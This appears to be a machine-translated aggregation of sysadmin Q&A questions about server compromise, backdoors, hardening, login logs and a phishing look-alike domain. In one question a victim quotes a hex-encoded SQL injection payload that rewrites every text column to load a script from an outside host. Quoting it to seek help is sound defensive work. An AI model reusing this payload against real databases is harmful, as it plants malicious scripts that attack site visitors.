相关疑难解决方法(0)

这是一个关于保护 LAMP 堆栈的规范问题

保护 LAMP 服务器的绝对准则是什么？

我开始为一家公司工作，该公司解雇了一名前 IT 员工，原因是泄露数据。

我只能说以下几点：

我们使用 Firebird DB 和由另一家公司 Proxmox 编写的应用程序，用于 Windows Server 2008 R2、SQL Server、云核心 Mikrotik 路由器和其他一些 Mikrotik 设备的虚拟化。

我不是 100% 确定，但是有没有一些快速的方法来检查是否还有一些后门，而不会中断内部流程并重新格式化所有内容？

以前的这个人真的很好，用 C++ 和 C# 编写了软件。我也知道他在 ollydbg 中做了一些汇编程序并破解了一些程序。

这是一个关于系统管理职业的规范问题

当我开始担任系统管理员时，我应该了解/学习哪些基本技能？

网络、存储、数据库和其他管理员有什么主要区别吗？

在阅读有关服务器入侵的这个问题后，我开始想知道为什么人们似乎仍然相信他们可以使用检测/清理工具或仅通过修复用于入侵系统的漏洞来恢复受损系统。

考虑到所有各种 root kit 技术和黑客可以做的其他事情，大多数专家建议您应该重新安装操作系统。

我希望能更好地了解为什么更多的人不只是从轨道上起飞并摧毁该系统。

这里有几点，我希望看到解决。

• 是否存在格式化/重新安装无法清理系统的情况？
• 您认为在什么类型的条件下可以清理系统，何时必须进行完全重新安装？
• 你有什么理由反对完全重新安装？
• 如果您选择不重新安装，那么您使用什么方法来合理地确信您已经清洁并防止再次发生任何进一步的损坏。

用户无法访问他们的电子邮件，CEO 无法访问公司的主页，您的寻呼机只是发出“911”代码。当一切都爆炸时你会怎么做？

有人可以告诉我在哪里可以找到 RedHat 和 SELinux 上的 SSHD 日志....我想查看日志以查看谁正在登录我的帐户..

可能重复：
我的服务器被黑了 紧急情况

天哪，我绝望了！几个小时前，我们的生产数据库被 sql 注入。

我知道我们的系统有一些大漏洞……因为我们从一个用经典 ASP 做网站的人那里继承了这个网站，他的编程真的很糟糕而且不安全。所以我们花了一些时间将它迁移到 ASP.NET（首先是 1.1，然后是 2.0，现在是 3.5）。但这是一个大项目，仍然有旧的和不安全的代码。我不会撒谎，项目一团糟，我讨厌它，但它是我们最重要的客户（我们只是两个年轻人，不是大公司）。

所以我知道他们以某种方式向我的整个数据库注入了一些 js 脚本引用......这可能是通过一个旧页面使用连接字符串 sql 查询并直接扔到数据库中（因为启动项目的那个人说“存储过程没有't work"..... 所以他使用字符串连接完成了整个站点，并将它们直接扔给 sql 而不做任何安全验证或任何事情。

当我们拿到项目时，客户不想花时间重做老家伙所做的废话。所以我们不得不导致糟糕和不安全的代码并在开发新功能时修复它，因为这是客户想要的......现在我们已经被注入了 sql 他们当然会发疯。

所以....

**有没有办法检查过去 X 小时内执行过的旧 sql 查询？类似于 SQL Profiler 的工作方式（当然，当攻击发生时，我们没有打开 Profiler）？有没有办法找出哪个页面是易受攻击的页面？请帮助，有很多页面。我无法在不知道哪一页是页面的情况下手动搜索这些内容。

另外......他们是否可以通过另一种方式注入数据库？喜欢使用 IIS 请求或 js 之类的吗？**

我拥有对服务器计算机的完全远程桌面访问权限（它不在托管环境中），因此我可以访问服务器上的每个文件、日志和任何内容...

请帮忙！

PS：对不起，我的英语不是很好，现在更紧张了！

编辑

• 视窗 2003 服务器
• SQL 服务器 2005
• ASP.NET 3.5

他们抛出的脚本如下

DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F006600310079002E0069006E002F006A002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200 AS NVARCHAR(4000));EXEC @S;

翻译成文字是：

DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR FOR 
select a.name,b.name from sysobjects a,syscolumns b 
where a.id=b.id and a.xtype='u' …

似乎有人使用 root 密码登录我的开发服务器并进行了大量破坏。如何在 Cent OS 上检查最近的登录名及其 IP 地址？

谢谢。

我目前开始部署面向 Web 的 Windows 服务器。

我想知道您保护服务器的方法是什么？你在用什么软件？

在 Linux 上，我使用 Fail2ban 来防止暴力破解，并使用 Logwatch 来获取有关我的服务器上正在发生的事情的每日报告。Windows 上是否有与这些软件等效的软件？如果没有，您建议使用什么来保护服务器？

两天前，有人创建了一个与我工作的公司具有完全相同域的网站，但缺少一封信，并向许多人发送了一封邮件，说该网站上有促销活动，当您访问该网站时，您（作为专业 IT 人员）会立即将其识别为诈骗网站，但很多人无论如何都不会，因此他们会在该网站上进行交易，并且不会收到他们支付的任何费用。

所以我们切换到恐慌模式来尝试弄清楚该怎么做，而我作为 DevOps 所做的是：

1. 将网站报告给 PayPal（网站上唯一可用的付款方式），但显然关闭网站需要很长时间和许多有争议的交易。
2. 向域名注册公司举报该网站，他们合作但停止该网站需要法院或 ICANN 的法律命令。
3. 向托管公司报告了该网站，尚未回复。
4. 检查了WHOIS数据，他们复制了我们的公司信息并更改了邮政编码和电话号码中的两位数字是无效的。
5. 向迪拜当地警方报告了该网站，但阻止网站也需要大量时间和调查。
6. 向我们的客户群发送了一封电子邮件，告诉他们要注意并始终检查他们是否在我们的 HTTPS 站点上，并在他们购买时检查域名。

我主要担心的是，许多报告他们收到电子邮件的人（超过 10 个）都在我们的邮件列表中，所以我担心有人从我们的服务器中获取了一些信息，所以我：

1. 检查系统访问日志以确保没有人访问我们的 SSH。
2. 检查数据库访问日志以确保没有人尝试访问我们的数据库。
3. 检查防火墙日志以确保没有人以任何方式访问服务器。

在那之后，我的担忧转向了我们用来发送电子邮件活动的邮件软件，我们之前使用过MailChimp，我认为他们不会访问它，但现在我们使用的是Sendy，我担心他们会访问它，我查看了站点论坛，没有发现有人使用 Sendy 报告了漏洞，而且我们邮件列表中注册的许多电子邮件都报告说他们没有收到来自欺诈站点的电子邮件，所以我有点放心没有人得到我们的数据。

所以我的问题是：

1. 我还能做些什么来确保没有人知道我们的邮件列表或数据？
2. 我还能做些什么来报告甚至关闭该网站？
3. 当您怀疑未经授权访问您的服务器或数据时，是否有紧急模式列表？
4. 您如何才能防止未来发生此类事件？